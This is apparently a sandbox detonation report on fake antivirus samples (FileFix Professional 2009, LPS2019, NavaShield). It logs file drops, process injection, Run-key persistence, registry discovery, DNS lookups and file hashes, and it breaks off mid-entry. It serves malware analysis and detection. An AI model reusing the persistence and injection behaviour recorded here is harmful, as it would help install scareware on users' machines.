File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\(144DPI)notConnectedStateIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-full_31bf3856ad364e35_6.1.7600.16385_none_ce3a164d3f0fa152\NavigationRight_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-m..ttheme-gb-component_31bf3856ad364e35_6.1.7601.17514_none_92d51a492ae12096\GB-wp2.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..calmediadisc-styles_31bf3856ad364e35_6.1.7600.16385_none_dac1eab162daeb45\4to3Squareframe_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\topGradRepeat.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\29.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_black_moon-new_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_black_moon-waxing-crescent_partly-cloudy.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\35.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..lpaper-architecture_31bf3856ad364e35_6.1.7600.16385_none_d99106b927aa7782\img16.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-g..picturepuzzlegadget_31bf3856ad364e35_6.1.7600.16385_none_ce76f352fa54bd75\settings_corner_bottom_right.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\bNext-hot.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-currency_31bf3856ad364e35_6.1.7600.16385_none_c3b9072b536514f6\graph_down.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-s..allpaper-landscapes_31bf3856ad364e35_6.1.7600.16385_none_e57abb2f66db71a9\img12.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-photosamples_31bf3856ad364e35_6.1.7600.16385_none_f36e0e659b8042be\Koala.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\28.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\docked_blue_sun.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-stacking_31bf3856ad364e35_6.1.7600.16385_none_d0d2b98d4629a41f\NavigationRight_SelectionSubpicture.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..ediadisc-style-pets_31bf3856ad364e35_6.1.7600.16385_none_d0d7ee773d711005\Pets_frame-border.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..yle-specialoccasion_31bf3856ad364e35_6.1.7600.16385_none_01242a21ddccaf3b\whitevignette1047.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Globalization\MCT\MCT-CA\Wallpaper\CA-wp3.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..c-style-performance_31bf3856ad364e35_6.1.7600.16385_none_1d8aecb671a2bda5\ParentMenuButtonIcon.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\Web\Wallpaper\Landscapes\img10.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-calendar_31bf3856ad364e35_6.1.7600.16385_none_6a1946701e0df451\rings-desk.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_4f7e32f76654bd3c\Bears.jpg C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-oldage_31bf3856ad364e35_6.1.7600.16385_none_02ee3365ea53e1ad\vintage.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-gadgets-weather_31bf3856ad364e35_6.1.7600.16385_none_a9cf548d21b86a2f\undocked_gray_hail.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..iadisc-style-travel_31bf3856ad364e35_6.1.7600.16385_none_f2a7c66510a5395d\play-background.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A
File opened for modification C:\Windows\winsxs\amd64_microsoft-windows-o..disc-style-memories_31bf3856ad364e35_6.1.7600.16385_none_51190840a935f980\button-highlight.png C:\Program Files (x86)\FileFix Professional 2009\wizard.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1696 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe
PID 1996 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe"

C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp" /SL4 $60150 "C:\Users\Admin\AppData\Local\Temp\Fake AV\FileFixPro\FFProInstall.exe" 232353 52224

C:\Program Files (x86)\FileFix Professional 2009\wizard.exe

"C:\Program Files (x86)\FileFix Professional 2009\wizard.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 filefixpro.com udp

Files

memory/1696-0-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1696-2-0x0000000000400000-0x0000000000413000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-SKHN9.tmp\is-BA4K2.tmp

MD5 0360b1d1195775766b2e78a7b463f658
SHA1 8e4b2b1b6d1e4446c979b0cea7db6db7eee21610
SHA256 bee86b674d51b4e21822e44f9408a69d60e282e39f5897888df334c74d840aa4
SHA512 23103b4457952091848f171f5c20351dd55ce1bce209da21c1b6792d6e0b13476a104698c31ad744df2df39408110d73f84b61e627bbb6d1d2a461db4370597d

\Users\Admin\AppData\Local\Temp\is-PF36L.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1696-16-0x0000000000400000-0x0000000000413000-memory.dmp

memory/1996-17-0x0000000000400000-0x00000000004B1000-memory.dmp

\Program Files (x86)\FileFix Professional 2009\wizard.exe

MD5 e1827fbbf959d7c5f3219a1f0b0c35fc
SHA1 677d7c6179729fdb4a25afdd5579533f1606c810
SHA256 c28ac5f267bec7650ce271c12b23f087f9c3927a46b48682e363581fa29e2a5d
SHA512 a65dc0550f9d1501add93390501027d83002c2df0df22bbf5d88dce9c98b6ebb4a2c297010e44cfebfaa8b7ba0f77ed12c2d13fb9b213e15c4b53dfd56ead0c3

\Program Files (x86)\FileFix Professional 2009\unins000.exe

MD5 361c253d8b03085714b050875274fb67
SHA1 1f79d4cde86f67b206bd623fac80c73463b59db4
SHA256 644cc1a533c21965d92af0d9ebb7a92ff6c9292582e7b4056d241bd590176023
SHA512 d3aa94c4b14883c66abdb733e7d2d6d62f3f255de005705d87d11a7096b168f38789e2010b6f582f572e97de9257d20358741a08e9c2881fce353b946f7b1875

\Program Files (x86)\FileFix Professional 2009\wizard.exe

MD5 87873a5927e1234f9a31089c5d33e526
SHA1 0d063f0c246ac4dffd18c2b8f51577e7bfa156f8
SHA256 29e39a5cf12995d3623c803d514c3c9f448a40bd9359cda1c41e894ef6e23a63
SHA512 d732e266ebbed9a330e4ea2e6a9007fed90829269293b285d9be3556872b291f8c93b700c820db17c2f37d73521e93ec4f59f2f264dc9c333e55031d4db70337

memory/1996-57-0x0000000000400000-0x00000000004B1000-memory.dmp

memory/1696-62-0x0000000000400000-0x0000000000413000-memory.dmp

Analysis: behavioral26

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

144s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftProz = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\HjuTygFcvX C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\__tmp_rar_sfx_access_check_240641656 C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File created C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A
File opened for modification C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\LPS2019.exe"

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 2780

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 79.121.231.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

MD5 2e6360eeebcafd207ad6f4cfc81afdb3
SHA1 6d85d48c8c809ad0ee5f7b1b20ef79e871466072
SHA256 3a31f386f4a68827d8cbfeb087c017f871d80ab4565a2266f692fbe6cfea9c3b
SHA512 36e1cadeff91158c0e96585d7550dc193a6470f5fccf3cf98845c4291becc6dae39609771cc8157493bc6cb405446ac55a1790108c6c213293bf4a56ecf381e4

memory/2924-15-0x00007FFE928C0000-0x00007FFE93261000-memory.dmp

memory/2924-16-0x00007FFE928C0000-0x00007FFE93261000-memory.dmp

memory/2924-17-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-18-0x000000001C1B0000-0x000000001C67E000-memory.dmp

memory/2924-19-0x000000001CD00000-0x000000001CE9C000-memory.dmp

memory/2924-20-0x000000001CF50000-0x000000001CFF6000-memory.dmp

memory/2924-21-0x000000001D0A0000-0x000000001D13C000-memory.dmp

memory/2924-22-0x0000000001720000-0x0000000001728000-memory.dmp

memory/2924-23-0x000000001D1A0000-0x000000001D1EC000-memory.dmp

memory/2924-24-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-25-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-26-0x00007FFE928C0000-0x00007FFE93261000-memory.dmp

memory/2924-27-0x00007FFE928C0000-0x00007FFE93261000-memory.dmp

memory/2924-28-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-29-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-30-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-31-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-32-0x0000000001740000-0x0000000001750000-memory.dmp

memory/2924-39-0x00007FFE928C0000-0x00007FFE93261000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

150s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaBridge.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaDebugger.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\NavaShield = "c:\\Nava Labs\\Nava Shield\\navashield.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe N/A

Checks installed software on the system

discovery

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Nava Labs\Nava Shield\NavaShield.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A
N/A N/A C:\Nava Labs\Nava Shield\NavaShield.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe C:\Nava Labs\Nava Shield\NavaShield.exe
PID 2212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe C:\Nava Labs\Nava Shield\NavaShield.exe
PID 2212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe C:\Nava Labs\Nava Shield\NavaShield.exe
PID 2212 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe C:\Nava Labs\Nava Shield\NavaShield.exe
PID 2012 wrote to memory of 436 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaBridge.exe
PID 2012 wrote to memory of 436 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaBridge.exe
PID 2012 wrote to memory of 436 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaBridge.exe
PID 2012 wrote to memory of 436 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaBridge.exe
PID 2012 wrote to memory of 1560 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaDebugger.exe
PID 2012 wrote to memory of 1560 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaDebugger.exe
PID 2012 wrote to memory of 1560 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaDebugger.exe
PID 2012 wrote to memory of 1560 N/A C:\Nava Labs\Nava Shield\NavaShield.exe C:\Nava Labs\Nava Shield\NavaDebugger.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\NavaShield.exe"

C:\Nava Labs\Nava Shield\NavaShield.exe

"C:\Nava Labs\Nava Shield\NavaShield.exe"

C:\Nava Labs\Nava Shield\NavaBridge.exe

"C:\Nava Labs\Nava Shield\NavaBridge.exe"

C:\Nava Labs\Nava Shield\NavaDebugger.exe

"C:\Nava Labs\Nava Shield\NavaDebugger.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 navashield.com udp
DE 64.190.63.222:80 navashield.com tcp

Files

memory/2212-11-0x0000000000400000-0x000000000047A000-memory.dmp

C:\Nava Labs\Nava Shield\NavaDebugger Libs\MD5.dll

MD5 831295342c47b770bf7cc591a6916fa7
SHA1 2c9063fbf3f3363526abdc241bf90618b82446d1
SHA256 8341ecc0938ca6d90b7e0f02af2d7e6b571c948a03a99d54af61c4557c78d656
SHA512 01419defe963a987989cddb0e21cf651ec3eefeae97cf4b257d4caa8da26436a647e8e4d95cdad22bbb0657171f6d3d9c41dc6fb217ffc7d5172ebc9a409d36e

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 ca349faf9fbed80c3eeb0c5735aad99c
SHA1 4707cd4b771f6c1783c492d1214f1e9e6a5551bc
SHA256 58d1784dbac1819d0dd11c60987f4442c99ea71fe8f9522a8299b3cff869194e
SHA512 4afb559f861053cb0352cf0d7bb69cfbc64e1c8565fd9fb8e53e3618a089da447f12da9b99626fbe16bf35c64147c4990eba3e601023c26bf53ea44876023bc3

C:\Nava Labs\Nava Shield\NavaShield Libs\Internet Encodings.dll

MD5 de5eefa1b686e3d32e3ae265392492bd
SHA1 7b37b0ac1061366bf1a7f267392ebc0d606bb3db
SHA256 a50e56dfb68410a7927ecd50f55044756b54868e920e462671162d1961bfe744
SHA512 c71270a5275f91214444449be4923a70243a9e2cd06afcc6fd28ab9f2cd2d930219ce8ed9ec008750b2611b62ed26b65cb57a75c6035201cd9657263d157d508

memory/2212-59-0x0000000000400000-0x000000000047A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$inst\0001.tmp

MD5 69ae1881260e0f7870e0e5508f34a502
SHA1 435c610d639c63b1a8e8a4ffd2188d0c47b155b3
SHA256 55ea4da6d3f5582a187942aba0a08555c4770731baf3557556aec63edbaf4415
SHA512 5232958fff6b2f2cf012e3ade5b60a5db696503e6b24c0781ad1cb30d99084d658e35fce4cde6eee6ed2d046297d6094c8f53b7c1510c3c05977162204617a8b

\Nava Labs\Nava Shield\NavaShield.exe

MD5 8bab9091f9d45d9d83fdebcaa4655e0e
SHA1 8c92be10d23ec9f0210cd25253a831ecd43f679f
SHA256 e1e6024b36a6e2ec620dd6f9db061a5e11b870229b398a25ddcebb4dc75ca7fe
SHA512 e970345034b3aa600851410a4f8348c359f606fa4b225d619bef0b24ae9cd7b133a013425dd1a2f884d60a2514ab5a6c85f1887fb32483fbda7d53ba5e018ee1

C:\Nava Labs\Nava Shield\NavaShield.exe

MD5 49d7c9b8aabdde050324079d80855763
SHA1 da9aefeae29148f92181f2303ef5804caab67779
SHA256 b5f836905e10c181a2c1d089765a0de51fc6b7b6883b4dcd78633b8d26a6e141
SHA512 5861e3b1d192f8fa580fdb8cdf8716a27b134b87668e838486a6f48192f0c4052ee63379402d6c48940501c8dea66de48b41fefbff34ac736f5bde9fc177a3d7

C:\Nava Labs\Nava Shield\NavaShield.exe

MD5 90fff0b193fd143b5b435cfd0604c2a6
SHA1 f48f79f814ea2a3c9b368004ec05aaa3c86c6839
SHA256 b956e0149d07163bcf85131b671267698321c5590e5e3b1a853be0d69adf3fbb
SHA512 d7bd9ca480dc03523d40a4f7533ea57db37ce603d2eb9609184284894014b1a976dc49ffa9b57650e9147367ceedcbd70fa2c2a3c87211a0b0a6945653c09aae

\Nava Labs\Nava Shield\NavaShield Libs\Appearance Pak.dll

MD5 fcf3ac25f11ba7e8b31c4baf1910f7a6
SHA1 fb470541f0b6b8f3ce69dcaa239ca9a7d7e91d72
SHA256 e5b3249fbeea8395fd56c20511bfcfdb2b2632d3c8d517b943466a4e47f97b5c
SHA512 47c467924d64af4a48a6e640778aca1dce379d16b06bf3f60a44025034c15ce1498ef307b63cb04e5c0cbb6c2ac58022acdb0d6efb1109c5ea31f842a320aa40

memory/2012-108-0x0000000002540000-0x000000000285B000-memory.dmp

memory/2012-115-0x0000000000710000-0x000000000072A000-memory.dmp

\Nava Labs\Nava Shield\NavaMod.dll

MD5 3d7f80fb0534d24f95ee377c40b72fb3
SHA1 11b443ed953dae35d9c9905b5bbeb309049f3d36
SHA256 abd84867d63a5449101b7171b1cc3907c44d7d327ea97d45b22a1015cc3af4dc
SHA512 7fc741bbce281873134b9f4d68b74ae04daf943ea4c0c26e7e44579f2d51883c635972a405dd81cee63079a5ba9d09328a1e26e7878547590569806d219d83c7

C:\Nava Labs\Nava Shield\config.dat

MD5 389bf6e15ae0a7250f454da52aa7ced5
SHA1 1f6a6fe568a1b863bf1f8a9bec9fc8a67e04ca43
SHA256 5993325acfe309946c176737a019aa16e22b921fa6387b766bf8bc8a504e220d
SHA512 74bf5a1b5aaa4a27777ef98744aa5a4aac9dc2d64def7be42883d965e77c06852b8bd61c9b7620030c0b5d712ddefdbf0786d0696f62459e33a0debfbc62eb22

memory/2012-112-0x00000000006E0000-0x00000000006F2000-memory.dmp

memory/2212-124-0x0000000000400000-0x000000000047A000-memory.dmp

C:\Nava Labs\Nava Shield\NavaBridge.exe

MD5 6f89df4cde193c0636c3d497cf1a17bf
SHA1 9faaa0100195e3e81fdade11e7a476a1fd1b23c8
SHA256 e7f05380e90dfb15b91b8bbc2ae48a04ba84d573b3c9f7d81bcc12f814215929
SHA512 c31848b1dceb8f8351991051b389a38b2ca0ae7ee98ebf626576245ca1588f1f6ee14e3eff7b165ecf9879e7e11ab77888e297cc4ccbb405b0ed64ebcda304b2

C:\Nava Labs\Nava Shield\NavaDebugger.exe

MD5 09e1f0733eb59abeb9180cd8db034053
SHA1 209c79c4eca9f4a8ea5ed78561a76c6fc4ecdef8
SHA256 7f9b0554775bbb6996de3a20038a08485fc8a211e0a4bb0aa055c3767339d00a
SHA512 515ff6df7d80fd81d0c7b3fb8ca64b29eeed5beb3dc42f14c6b17f4dc788e2d75e5df88273e151cb01cb92875eefb314219e48de9991ba4f8a76b0602bc7d532

C:\Nava Labs\Nava Shield\NavaBridge.exe

MD5 57665e9b4d766001862c38bde736f965
